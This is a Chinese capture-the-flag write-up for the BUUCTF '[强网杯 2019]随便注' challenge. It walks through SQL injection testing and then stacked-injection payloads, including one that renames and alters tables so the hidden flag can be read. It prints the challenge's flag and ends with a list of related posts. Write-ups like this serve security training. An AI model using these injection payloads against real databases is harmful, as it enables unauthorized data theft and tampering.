题目[强网杯 2019]随便注 1

题目来源:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8

分析过程:

进入靶场出现如下页面

判断是否存在注入,注入是字符型还是数字型
输入1'发现不回显,显示错误1064
输入1' #显示正常
初步判断存在sql注入
输入1' or '1'='1,正常回显,初步判断该注入为字符型

输入1' order by 1#和1' order by 2#,都正常回显

输入1' order by 3#,显示报错1054

查看字段

输入1' union select 1,2#,显示了一个正则过滤规则,select,update,delete,drop,insert,where 和 . 被过滤掉了

根据上述尝试使用堆叠注入

查询数据库1';show databases;#,成功回显,回显如图

回显说明该注入点确实存在堆叠注入

查询表名1';show tables;#,回显如图

得到两个表1919810931114514words

查询字段

  • 输入1'; show columns from 1919810931114514; #,回显如图

  • 输入1'; show columns from words; #,回显如图

查看两个表,发现在1919810931114514表中中有我们想要的flag字段

我们可以发现,该注入点只能回显出words字段中的内容,我们可以尝试使用alert和rename语句,将表1919810931114514改成words,从而获取flag

Payload:1';RENAME TABLE words TO wordstemp;RENAME TABLE 1919810931114514 TO words;ALTER TABLE words CHANGE flag id VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;#

发送请求,回显如图

接着输入*1' or '1'='1 #*查询获得flag

flag:flag{492f055b-4ba3-4810-b1c2-74c8d3a85568}

[强网杯 2019]随便注 1相关推荐

  1. BUUCTF Web [强网杯 2019]随便注

    「作者主页」:士别三日wyx   此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...

  2. [强网杯 2019]随便注 —— 堆叠注入

                           [强网杯 2019]随便注 前言        个人观点,若有误请指教 解题思路及步骤 直接上'引号,结果直接报错了,证明存在sql注入漏洞. 判断当前表 ...

  3. buuctf [强网杯 2019]随便注 1

    buuctf web [强网杯 2019]随便注 1 -刷题个人日记 小白一个,写给自己看. 打开后是这样. 从题目和内容来看就是一道sql注入题. 输入 1' or 1=1;# 这个#用来注释掉后面 ...

  4. BUUCTF [强网杯 2019]随便注

    题目 打开环境发现是经典的提交界面 老规则还是查询注入点,1 or 1 =1#,1' order by 1#都未出错,但是1' union select 1,2#是出现了错误,发现一些查询语句被过滤了 ...

  5. 强网杯 2019]随便注 【SQL注入】四种解法

    题目简介 题目名称:[强网杯 2019]随便注 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL注入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = ...

  6. BMZCTF 强网杯 2019 随便注 原理+题解

    目录 知识点 堆叠注入 show语句 mysql预编译 过程 重点 预编译 重命名 总结 知识点 堆叠注入 堆叠查询注入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开.而堆叠查询注入攻击就 ...

  7. (二)强网杯2019[随便注]

    堆叠注入学习(堆叠查询,Stacked Queries) 堆叠注入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠注入可以用于执行任何SQL语句. 堆叠注入原理 在 ...

  8. [强网杯 2019]随便注 1【SQL注入】解析过程

    1.首先启动并访问靶机,有一个输入框,随便输入1' or 1 = 1,测试一下是否存在sql注入. 2.提交后提示error 1064 : You have an error in your SQL ...

  9. BUUCTF-WEB:[强网杯 2019]随便注 1

    题目环境:http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn 打开环境: 尝试注入: 解题思路: 1.先尝试用union联合注入: 第 ...

最新文章

  1. mysql long raw_读取Oracle数据库中LONG RAW字段会抛出异常
  2. 国内人工智能专利布局存隐忧
  3. 他曾是离诺贝尔奖最近的中国人之一!
  4. OpenShift 4 - 直接将Web应用当成Serverless运行
  5. LeetCode 59. Spiral Matrix II
  6. 软件测试仓库管理信息系统,仓库管理系统测试报告
  7. adb工具构成及原理
  8. RoboWare Studio:简介
  9. welearn综合教程网课答案
  10. CSDN表格换行方法
  11. CTGU 2021春-MySQL数据库实验2:基本查询5-6关,共5小题全代码+信息表+通关截图!
  12. 【附源码】Java计算机毕业设计安卓高速铁路配餐app论文(程序+LW+部署)
  13. 武汉工程大学信息与计算科学专业面向对象程序设计课程设计题
  14. SpringCloud Alibaba 从入门到精通(精选)
  15. 如何实现监控视频RTSP流在网页中低延时播放
  16. Penalty-Based Multibody Animation(1)
  17. 使用电脑获取手机相册教程
  18. matlab解决相遇追及问题,猎犬追狐狸试题中追击时间问题的严格求解.doc
  19. Python实现阳历转农历功能
  20. antd动态换主题颜色

热门文章

  1. 抽奖随机滚动_原来抽奖不是凭运气!两个技巧,让你在抽奖环节独占鳌头
  2. 【T+】根据畅捷通T+的账套备份文件判断软件版本以及数据库
  3. 定义一个矩形类Rectangle:(知识点:对象的创建和使用)
  4. cisco packet tracer 介绍
  5. 卡塔尔世界杯有哪些高科技?-世界杯征文
  6. vue-awesome-swiper 传参控制滑动位置 滚动位置 slideTo 备注防止后期忘记
  7. golang 实现数据结构-顺序栈
  8. 人工智能 —— 知识图谱
  9. 06-01 DeepLearning-图像识别
  10. C++11时代的标准库快餐教程(4) - 排序算法的应用